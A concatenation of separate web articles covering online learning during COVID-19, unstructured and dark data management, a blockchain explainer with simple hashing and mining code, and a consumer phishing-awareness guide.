A May 2020 study examining the impact of school closures on student learning demonstrated that students in schools using technology-enabled instruction, in this case Achieve3000 Literacy, a reading program that helps teachers differentiate instruction for students in grades 2-12, continued to attain similar levels of reading growth during school closures as they had earlier in the year.
Shai Reshef, president of University of the People, an online, non-profit, tuition-free, American-accredited University, says: “Ready or not, COVID-19 has forced higher education online. Universities were ill-prepared to fully switch online and are all understandably frustrated at having to do so in just a few weeks, and even more so now that there is a possibility of remaining online until 2021.”
Reshef says that a big problem many universities are facing right now is that they have been forced to go online before they are ready. But moving to online instruction is tricky and if not implemented properly, instead of succeeding, the online classes may backfire and create major disappointments.
“Quality higher education online is more than just a live zoom class. Developing content and technique that works online takes time, and creating a quick fix for campus closures is going to be difficult,” he said. “At University of the People, we didn’t need to suddenly adapt to an online environment – we’ve been doing this for the past decade and have the infrastructure in place, and the pedagogy and experience in remote learning. For example, our instructors are experienced in teaching online, and are trained on how to address the unique challenges students will face, such as motivation, self-discipline, and the ability to learn alone.”
According to a University of the People/Harris Poll, nearly a third (31%) of Americans have experienced frustration with online schooling systems since the stay-home orders went into effect.
Responses by Nick Schiavi, vice president and global head, higher education, Unit4.
Because most schools have moved to virtual learning environments in response to COVID-19, what are the likely long-term outcomes of this?
The conversations we’ve had lately with our customers, from our people in the field who are leading projects, and those who are in touch with the macro-responses by the global industry, are pointing to a couple of things:
There will likely be more effort spent on planning for continuity of operations. Ensuring that education can still be delivered and institutions can continue to operate without being fully dependent on being in an office is likely to be a focal point.
There is likely to be a focus on faculty enablement and the operational support around them to help them be more comfortable delivering courses anywhere and anytime.
I doubt in-classroom education will go away for good. Will there begin to be a sea-change? Potentially yes, considering all the ways we learn today, during any phase of life, there is a combination of in-person instruction and training; experiential and immersive learning; and self-paced knowledge consumption.
From what I’ve been reading and hearing from educators and other vendors, this situation could create a time to re-focus on curriculum design and delivery methods to increase student engagement. Having family members who are educators, I know the rigors of transitioning instructional design and faculty enablement to effectively deliver online courses can be substantial but enduring them is important to be successful in that transition.
What might institutions need to do to attract and retain students in a climate where supply may begin to outpace demand?
This is an interesting question since enrollment and retention have been common challenges for a long time, even prior to this pandemic. Ultimately I believe that institutions will double-down on their interest in differentiating themselves from their peers. Competition for fewer enrollments may occur in the near term; however, this also offers opportunity for institutions to create more demand for education from a wider age-range of students.
Many institutions already look at “traditional vs. non-traditional enrollments” but this situation may be a catalyst for every institution to focus more on how they can engage new segments of the population as students. I suspect it will provide an opportunity for institutions to become more creative as marketers – potentially even thinking of themselves as product managers seeking to understand their target segments more deeply and re-packaging their offerings to attract new enrollments that are the best fit, which should also help with retaining those students.
How do you continue to support the health, safety, and well-being of students, faculty, and staff with everyone distributed remotely?
I look at this from the angle of prioritization of the urgent-important items first. Imagine if all of our customers lived, worked, and ate in our offices – day in and day out – and they also happened to be young adults not yet accustomed to being on their own. In that scenario during a pandemic crisis I’d first look at how we transition all of our customers back to a safe and protected place, how we monitor and account for their successful transition, how we handle the same monitoring and accounting for our own staff, and only then start looking at basic operations and service delivery needs which in many cases include providing equipment and communications tools to staff that they don’t currently have.
So on top of accounting for everyone, you need to ensure you have the supply chain moving to equip them all. That’s the type of scenario institutions are facing around the world right now – it’s a version of Maslow’s Hierarchy where everyone is reset to ensure the basic needs are met first. Only after that phase, which I suspect many US institutions are emerging from now, can they look at continuity of operations and academic delivery beyond the immediate term.
In the long run I suspect this increases the prioritization of digital transformation and organizational change management but those cycles can only happen after the first layers of the Hierarchy are addressed.
A new online math learning program from McGraw Hill makes it easy and affordable for students and adult learners to prepare for their math placement test, get extra help over the summer, or refresh their skills before returning to college.
ALEKS MathReady is a direct-to-student version of McGraw Hill’s personalized ALEKS program that is used by millions of K-12 and college students to accelerate their math learning and help them succeed in their courses. It is $9.95 for the first month, $24.95 for three months, and $19.95 for each additional month after that.
For students entering college, math placement and college level math courses can be a challenge and are among the contributing reasons that students fall behind or drop out. College math courses often have high failure rates, largely because many new college students lack the foundational math skills needed to be successful. For some, a trusted tutor is a proven model for learning math and reducing math anxiety, yet the high cost of tutoring and scheduling tutorial sessions are barriers. ALEKS MathReady is an affordable alternative for those who are looking for math support.
ALEKS MathReady is a self-paced, online math learning program that is rooted in research and analytics. ALEKS efficiently guides learning by identifying what topics students don’t know and then focusing them on practicing topics they are ready to learn next. With this personalized learning approach, students learn and retain topics efficiently with real-time feedback to keep them motivated and engaged, while reaching their goals.
By Melinda Kong, director of instructional design and learning management system, Nyack College
As we emerge from the last few months of the sudden online teaching shift for courses intended for classroom settings, there are a few glaring lessons learned that will help propel educators forward into the future. While much is still unknown for what the next several months will hold, it is certain that online classwork will be a predominant feature in education.
The methods of online teaching will look different within each education context from K12 to higher education, but one thing is certain; online learning is here to stay and we must adapt to the needs of current and incoming students.
We will likely see a mix of three offerings when thinking about the new normal of distanced learning; the continued implementation of hybrid courses, full fall terms taught online-only, and even HyFlex courses, in which students will be able to be in either face-to-face classes or join virtually when needed.
As educators, it’s important to look at what happened as courses were quickly moved online and learn from what was able to be accomplished. Understanding what worked well and what didn’t will help all educators grow and adopt better pedagogy for online instruction.
Foundationally all courses, despite their delivery makeup, involve diligent planning. All teachers, whether in a face-to-face classroom, online course, or a mix of the two, plan extensively for their courses.
Response from Kaine Shutler, managing director, Plume.
Schools might be presented with a unique challenge in the short term: creating an e-learning platform, populating it with content etc. But long term, this system will provide students with more learning opportunities and we see this benefitting both the academically engaged students, but most importantly, the students who have struggled with classroom learning.
For parents, we hope that they’ll be more active in their child’s learning and we believe this will strongly improve caregiver/ student relationships, as well as student’s confidence as they engage with independent learning opportunities.
Despite these merits, e-learning will not replace classrooms; schools provide a safe place for students where they can be mentored by teaching professionals and gain valuable social skills. All in all, we think e-learning will support classroom learning and independence, and will strengthen student/parent relationships as parents play a more active role in academic development.
What is unstructured data?
Unstructured Data refers to information that doesn't follow a predefined format or organised structure, making it more challenging to analyse and process. Unlike neatly arranged data found in spreadsheets or databases, unstructured data lacks clear categories or labels.
What does Unstructured Data look like?
It includes things like text from emails, social media posts, audio recordings, images, videos, and documents. Because of its free-flowing nature, extracting valuable insights from unstructured data requires advanced technologies, like artificial intelligence and natural language processing, to understand and interpret the content effectively.
What are the Challenges of Unstructured Data?
Dealing with unstructured data presents real difficulties. The information lacks organisation, which complicates analysis, and it often sits in non-relational stores, which makes querying hard. Key issues include:
Security complexity: Unstructured data's dispersion across formats and locations makes securing it intricate.
Indexing challenges: Due to its randomness, indexing is tough and error-prone.
Data scientist dependence: Interpreting unstructured data often demands skilled data scientists.
Costly analytics tools: Parsing such data requires advanced, expensive analytics software, not always budget-friendly.
Format diversity: Unstructured data's lack of format hampers its raw use.
Why is it important?
A lot of data that is essential for tackling complex issues can't be stored in traditional databases. Customer buying patterns mapped to social media feeds are one example; CCTV footage is another: you need to refer to it at a later date, but you can't store video files in a database. Both are forms of unstructured data.
Did you know 80% of data growth in an organisation is unstructured data?
Why choose boxxe?
This is where boxxe comes in. We can help by working with key technology partners such as Dell, Quantum and Hitachi Vantara, who work closely with our ISV partners Libnova, Archivematica, Preservica and Atempo. boxxe can make sense of messy data from places like social media, emails, and images by extracting important information from text and sorting the data into useful categories. Data enrichment is the key: adding meaningful metadata turns data into searchable, contextual information, the foundation for the insights that lead to better decisions, improved operations and a better customer experience.
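As a simple illustration of what enrichment means in practice, the sketch below (field names are illustrative assumptions, not a boxxe or partner API) attaches basic searchable metadata to a raw document:

```python
from datetime import datetime, timezone

def enrich(doc_id: str, text: str) -> dict:
    """Attach minimal searchable metadata to an unstructured document."""
    return {
        "id": doc_id,
        "ingested_at": datetime.now(timezone.utc).isoformat(),
        "type": "email" if text.startswith("Subject:") else "document",
        "keywords": sorted({w.strip(".,:").lower() for w in text.split() if len(w) > 6}),
    }

print(enrich("msg-001", "Subject: Renewal quotation for the storage contract"))
```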
Extract insights for enhanced business decisions and better customer experience
Find out more below
We can provide solutions for the complete journey: understanding your estate with our audit and assessment tools, producing strategy and roadmap reports, and storing and managing the data with vendor solutions from Dell, Quantum and Hitachi.
Contact the Infrastructure Team via the form below to learn how boxxe can help by collaborating with technology partners to decipher unstructured data from all your sources. Extracting insights enables better business decisions and better customer experiences.
People frequently ask me, “Please tell me, what is blockchain and how does it work?” I have been using various approaches and media to answer this question, whiteboards, paper and even beer coasters, and recently created a single-page canvas combining all my scribbles and drawings. This works very well, with great response, and I would like to share it, including the story that goes with it. Maybe it is somewhat technical, but most people follow the explanation quite well and really feel that they have learned something. Re-use is granted, but please keep it “as is” and respect the copyrights. (See below for downloads, OpenOffice and PDF format)
Doing business and transactions between organizations and people requires TRUST. Normally we do not think about this, but every day we pay our invoices or buy goods with a debit or credit card, issued by a bank or credit card company who guarantees these payments. These so-called middlemen are initiated, regulated and audited by governments, giving us the required trust. But what if you could arrange this via technology, providing the same guarantees as a middleman but without the middleman? This is where blockchain can help us, providing a mechanism to do business without knowing your counterparty or their reputation. First used for Bitcoin transactions (crypto-currency), but suitable for any other transaction or contract that we want to register in an immutable and secure manner. Think about registering land property, music rights or mortgages.
In a typical blockchain we recognize four important elements: the hash, the block, the nonce and the consensus model. How does this work?
First let me explain hashing, a key element in blockchain. Hashing is a mathematical function that converts an arbitrary text into a fixed-length digital key. This process is irreversible, every key produced is unique, and even the slightest change in the input generates a completely different key. (Observe the W and w difference.) This key, also called the HASH, can be seen as the unique signature or fingerprint of that piece of text or information. (FYI: the SHA family of hash functions was designed by the United States National Security Agency (NSA) and made available under a royalty-free license.)
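A quick demonstration with Python's standard hashlib and SHA-256 makes this avalanche effect visible; note how changing a single W to w produces a completely different key:

```python
import hashlib

def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

print(sha256_hex("We trust blockchain"))
print(sha256_hex("we trust blockchain"))  # one character changed, entirely new hash
```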
Next, let’s have a look at a block and its structure in a simplified model. We distinguish two main parts: the heading of the block with housekeeping details, and a section containing the transactions. (In this example you see a set of simple financial transactions, but any transaction can be included.) The housekeeping section is especially important as it is used to link the new block with previous blocks. Within the heading we see several fields, and most are pretty straightforward: version info, a time stamp and a copy of the previous block’s hash. To ensure that the transactions in the block itself are fingerprinted in an irreversible way, a “Transactions Hash” is generated from all entries with the algorithm explained above and added to the header. The information of all these header fields is then used to generate the hash, or signature, of the block.
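In code, the simplified block model can be sketched as follows; for brevity this hashes all transactions in one go, whereas real chains such as Bitcoin build a Merkle tree of transaction hashes:

```python
import hashlib, json, time
from dataclasses import dataclass, field

def sha256_hex(data: str) -> str:
    return hashlib.sha256(data.encode("utf-8")).hexdigest()

@dataclass
class Block:
    previous_hash: str
    transactions: list
    version: int = 1
    timestamp: float = field(default_factory=time.time)
    nonce: int = 0

    def transactions_hash(self) -> str:
        # Fingerprint of all transactions in the block (simplified Merkle root).
        return sha256_hex(json.dumps(self.transactions, sort_keys=True))

    def header_hash(self) -> str:
        # The block's signature is computed over the header fields only.
        header = (f"{self.version}{self.timestamp}{self.previous_hash}"
                  f"{self.transactions_hash()}{self.nonce}")
        return sha256_hex(header)
```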
So why do we include a NONCE in the header?
Creating a signature of a new block is pretty straightforward, but that also makes it vulnerable to anyone who wants to tamper with its content. Calculating a hash is a matter of milliseconds, so changing a transaction and creating a new hash is very easy, too easy, and therefore not 100% secure. We can prevent this by demanding that the hash of a block starts with a number of leading zeroes, which is only possible if we change the input for the hash calculation. This is where the nonce (number used once) comes into play: every time we change its value, a different hash is generated. Verifying all possibilities requires serious compute power and time, and that makes it unattractive to tamper with the transactions in the new block and all depending previous blocks. This process is known as “mining a block”, and it provides us with the security that transactions are written in stone and immutable. Mining, especially of crypto-currency, is financially very profitable, and more compute power is added on a daily basis. To deal with this, the number of leading zeroes is regularly adjusted to balance the increase in compute power. (FYI: the mining reward for the Bitcoin blockchain is currently 12.5 BTC per block.)
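Continuing the Block sketch above, mining is then nothing more than a brute-force search for a nonce that produces the required leading zeroes (four here, far fewer than a real network demands):

```python
DIFFICULTY = 4  # number of required leading zeroes; real networks adjust this

def mine(block: Block) -> Block:
    target = "0" * DIFFICULTY
    while not block.header_hash().startswith(target):
        block.nonce += 1   # every new nonce yields a completely different hash
    return block

block = Block(previous_hash="0" * 64,
              transactions=[{"from": "alice", "to": "bob", "amount": 5}])
mined = mine(block)
print(mined.nonce, mined.header_hash())  # hash now starts with "0000"
```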
Once the right hash is found, the newly mined block is presented to the network of “fellow” miners for approval and consensus. In Bitcoin, a block is typically considered final after six confirmations, after which it is firmly part of the chain. This consensus cycle is another security mechanism adding to the robustness of a blockchain. The process repeats itself: the hash of the recently added block is used as input to mine the next block, resulting in a chain of blocks. Impossible to alter without changing the previous block, and the previous block, and the previous block…
Blockchain offers us an highly effective means to organize the need for trust in a different way, secure and clean on a global basis, robust and transparent with no/limited overhead.
Originally posted at: LinkedIn | <urn:uuid:9910a402-19f5-48ae-bc12-f6e6ecf78c11> | CC-MAIN-2024-38 | https://resources.experfy.com/fintech/please-tell-me-what-is-blockchain-and-how-does-it-work/ | 2024-09-16T06:04:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00620.warc.gz | en | 0.947405 | 1,047 | 3.078125 | 3 |
With the progress of the digital world, cybercrime has surged, and phishing has unfortunately become one of criminals' favorite methods of attack.
Fraudsters use these attacks to trick people into disclosing deeply personal, confidential details, such as login credentials and credit card numbers.
Phishing fraud may bring catastrophic outcomes like financial losses, identity theft, or data breaches.
It is therefore worth learning precisely how phishing operations work, so you can recognize them and protect your computer from these dubious attacks.
Phishing is a social engineering attack in which cybercriminals impersonate a trusted source, such as a bank, company, or governmental body, to obtain personal data like banking details.
Such scammers achieve their goal by sending phony emails and text messages or creating bogus websites that look legitimate.
Once an unsuspecting individual is manipulated into giving away their personal details or clicking links or attachments containing malware, the hacker can steal their identity and siphon money from their financial accounts.
The phishing landscape is enormously diverse: attacks vary in technique, goal, and target audience. Here are some common types of phishing attacks:
Email phishing: the most widely distributed attack. Cybercriminals send fake emails that appear to come from trusted providers like banks, online stores, or service providers.
Spear phishing: a more convincing and precise variant, almost always concentrated on specific individuals or organizations. The hackers dig deeper to find particular information concerning the victim and fabricate email messages that look authentic, which makes the attack more effective.
Smishing (SMS phishing): a text message takes the place of an email and directs the victim to click on dangerous links or provide important information.
Vishing (voice phishing): an attack carried out over phone calls or voicemails. The attackers pose as legitimate organizations and sway the victim into submitting personal data or transferring funds.
Pop-up phishing: cybercriminals create imitation customer-support agents or pop-ups that look legitimate and ask users to provide login credentials or secret information.
Phishing attacks commonly follow the same scheme, regardless of the attacker's particular goal. Here's how they usually work:
1. Bait creation: the attacker crafts a fake email, message, or website that impersonates a trusted source.
2. Delivery: the bait is sent to a specific victim or blasted out to thousands of recipients.
3. Deception: the message manufactures urgency, fear, or curiosity to pressure the victim into clicking a link or opening an attachment.
4. Data capture: the victim enters credentials or personal details into a fake form, or malware is silently installed.
5. Exploitation: the attacker uses the stolen data for fraud, identity theft, or follow-on attacks.
While phishing attacks can be highly sophisticated and convincing, several signs can help you recognize them: unsolicited requests for sensitive information, offers that seem too good to be true, an artificial sense of urgency, and messages from organizations you have no relationship with.
Phishing emails are the most common form of attack. Here are some key characteristics to look out for:
- Generic greetings such as “Dear Customer” instead of your name.
- Spelling mistakes and grammatical errors.
- A sender address that does not match the organization it claims to come from.
- Links whose real destination differs from the displayed text (a check illustrated in the sketch below).
- Unexpected attachments.
- Threats or deadlines designed to rush you into acting.
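One of those characteristics, a link whose destination does not match the claimed sender, can even be checked mechanically. The Python sketch below uses only a crude domain comparison, so treat it as an illustration rather than a real detector:

```python
from urllib.parse import urlparse

def looks_suspicious(link_url: str, claimed_domain: str) -> bool:
    """Flag links whose host is neither the claimed domain nor a subdomain of it."""
    host = urlparse(link_url).hostname or ""
    return not (host == claimed_domain or host.endswith("." + claimed_domain))

print(looks_suspicious("https://secure-yourbank.example.net/login", "yourbank.com"))  # True
print(looks_suspicious("https://online.yourbank.com/login", "yourbank.com"))          # False
```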
Phishing scams can take many forms, but some common examples include:
- Fake bank security alerts asking you to “verify” your account.
- Parcel delivery notifications containing malicious tracking links.
- Account suspension notices from streaming or email providers.
- Bogus invoices or payment requests.
- Prize and lottery notifications requesting a fee or personal details.
- CEO fraud, where an attacker poses as an executive and requests an urgent transfer.
To protect yourself from phishing attacks, follow these best practices:
- Verify the sender's address before acting on any message.
- Hover over links to inspect their real destination before clicking.
- Never share credentials or card details in response to an unsolicited message.
- Enable multi-factor authentication on important accounts.
- Keep your operating system, browser, and security software up to date.
- Use spam filters and report suspicious messages.
If you suspect that you've fallen victim to a phishing attack, take the following steps immediately:
1. Change the passwords of any accounts that may be compromised.
2. Contact your bank or card issuer if financial details were exposed.
3. Run a full malware scan on the affected device.
4. Monitor your accounts and credit reports for unusual activity.
5. Report the incident to the relevant authorities.
Informing the authorities about phishing attacks is a meaningful way to track and fight them. Here are some ways to report phishing:
- Use the “report phishing” option in your email client or webmail provider.
- Notify the organization that was impersonated.
- Forward phishing emails to the Anti-Phishing Working Group at reportphishing@apwg.org.
- In the US, report fraud to the FTC; in the UK, report to Action Fraud.
One strong layer of protection is the use of S/MIME certificates. These digital certificates add encryption and digital signatures to your emails, ensuring the confidentiality and integrity of your email communications.
S/MIME certificates let recipients verify the sender's identity and protect your vital information from being intercepted or tampered with by phishing operators.
Phishing attacks are one of the most severe threats to individuals and organizations worldwide, taking advantage of people's lack of awareness. Therefore, it is important to stay cautious to avoid being trapped by these predators.
By understanding how phishing works, learning to identify the elements of phishing emails, and following the guidelines for online security, you will greatly reduce the risk of becoming a victim.
Remember that when a situation feels suspicious, it usually is. If something raises your suspicions, act quickly and report it to the authorities.
Frequently Asked Questions
What is the difference between phishing and spear phishing?
Phishing scams are widespread and target millions of people at once, approaching victims from many different angles. Spear phishing, by contrast, is more targeted and is shaped by research into the selected individual or organization.
In addition to targeting an individual via phone calls or voice mails, a cybercrime tactic termed “vishing” or voice phishing may be applied.
You should never click on links or open attachments received from unknown or suspect sources; they can be part of a spear phishing attempt or contain malware.
If you become a victim of phishing, change the passwords for all affected accounts, keep an eye on your financial accounts and credit records, and pass on everything you know to the responsible authorities.
While antivirus programs can detect and block some phishing attempts, they are not foolproof.
It is essential to know and apply online security best practices, such as verifying the legitimacy of anyone requesting sensitive information and being extremely careful with emails or messages whose origin you cannot confirm.
What is dark data?
Dark data refers to the unused, largely unstructured data that an organization stores, typically retained for compliance or possible future forensic investigations. Gartner defines dark data as "the information assets organizations collect, process, and store during regular business activities, but generally fail to use for other purposes." Examples of dark data include server log files, records of former employees, email archives, and older versions of files currently in use.
Dark data statistics
- In a 2019 survey of more than 1,300 global businesses, 60 percent said that more than half of their data was dark.
- 32 percent of respondents cited a lack of resources as a hurdle to retrieving dark data.
Why is dark data important?
Gain untapped insights
Dormant business data can be mined for essential insights and patterns in internal processes and customer correspondence, fueling continuous improvement. Organizations that ignore the important information hidden within dark data risk losing ground to competitors.
Spot security vulnerabilities
When the bulk of your data is not securely stored, it is vulnerable to leaks and theft. Hackers find it extremely easy to reach data that is publicly accessible or held on systems running outdated software components. It is therefore important to know whether any business-critical information sits within your dark data stores.
Optimize data storage
Old and stale files that are no longer in use should be pruned from your storage ecosystem, because the cost of storing stale files and other redundant data is quite high. A redundant, obsolete, and trivial (ROT) data calculator can show how much you could save; a simple estimator is sketched below.
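As a rough illustration of such a calculator, the Python sketch below walks a directory tree and totals the size of files that have not been modified for a number of years. The three-year threshold and the share path are assumptions; a real ROT analysis would also detect duplicates and trivial file types.

```python
import os
import time

def stale_bytes(root: str, years: int = 3) -> tuple[int, int]:
    """Count files unmodified for `years` and sum their sizes in bytes."""
    cutoff = time.time() - years * 365 * 24 * 3600
    count, total = 0, 0
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
            except OSError:
                continue  # skip unreadable or vanished files
            if st.st_mtime < cutoff:
                count += 1
                total += st.st_size
    return count, total

files, size = stale_bytes("/srv/file-share")  # hypothetical file share
print(f"{files} stale files, ~{size / 1e9:.1f} GB potentially reclaimable")
```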
What is dark data management?
Dark data management is the overall governance of underutilized data in an organization. It defines a framework for how that data is collected, processed, utilized, and disposed of. With proper management of dark data, organizations can improve their customer experience, understand market trends, and strengthen their business operations to develop and maximize profits.
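One lightweight way to picture such a framework is a retention policy that maps each category of dark data to an action once its retention period lapses. The categories, periods, and actions below are illustrative assumptions, not recommendations.

```python
from datetime import date, timedelta

# Hypothetical policy: days to retain each category, then the action to take.
RETENTION_POLICY = {
    "server_logs":         (365,  "delete"),
    "ex_employee_records": (2555, "archive"),  # roughly seven years
    "old_file_versions":   (180,  "delete"),
    "email_records":       (1825, "review"),
}

def due_action(category: str, created: date, today: date | None = None) -> str:
    """Return 'retain' or the policy action for a record of the given age."""
    today = today or date.today()
    retain_days, action = RETENTION_POLICY[category]
    expires = created + timedelta(days=retain_days)
    return action if today >= expires else "retain"

print(due_action("server_logs", date(2023, 1, 1)))  # likely 'delete' by now
```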
Types of dark data
Based on how it is used and where it is sourced from, dark data is categorized as:
- Redundant data: Data that is copied multiple times, intentionally or unintentionally, across files.
- Unused data: Data that is collected during business interactions but is left unprocessed in file repositories.
- Spatial data: Data collected by IoT devices, such as sensors and processors that interact with other electronic devices.
- Unstructured data: Raw data that has not been categorized by any criteria and cannot be used directly for decision-making.
- Metadata: Secondary data that describes or adds context to primary data, such as its format, its source, and the time at which it was collected.
- Syndicated data: Datasets captured from third-party firms and not as part of an organization's business operations.
Security concerns over dark data
Dark data can be vast, and organizations often leave it unsecured. By not monitoring dark data, businesses face the following risks (a simple PII-scanning sketch follows the list):
- Exposure or breach of sensitive data such as personally identifiable information (PII), confidential business data, and customer payment information left unidentified in your repositories.
- Unsecured access to internal data such as log files, passwords, and former employees' information, which malicious insiders and external hackers can leverage to carry out data theft or breaches.
- Older file versions or software versions can enable hackers to create a backdoor into the organization's network.
- Unstructured data that is not monitored for sudden spikes in file activity can allow ransomware and other malware infections to go undetected.
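To show what "knowing what sits in your dark data" can look like in practice, here is an illustrative-only Python sketch that scans files for patterns suggesting sensitive data. The two regexes and the scanned path are assumptions; real data loss prevention tools use far more robust detection.

```python
import os
import re

# Crude patterns for demonstration: email addresses and card-like numbers.
PATTERNS = {
    "email address": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "possible card number": re.compile(r"\b\d{4}[ -]?\d{4}[ -]?\d{4}[ -]?\d{4}\b"),
}

def scan_for_pii(root: str):
    """Yield (path, label) pairs for files matching any sensitive pattern."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as f:
                    text = f.read(1_000_000)  # sample the first ~1 MB
            except OSError:
                continue  # skip unreadable files
            for label, pattern in PATTERNS.items():
                if pattern.search(text):
                    yield path, label

for path, label in scan_for_pii("/srv/archive"):  # hypothetical dark data store
    print(f"{label} found in {path}")
```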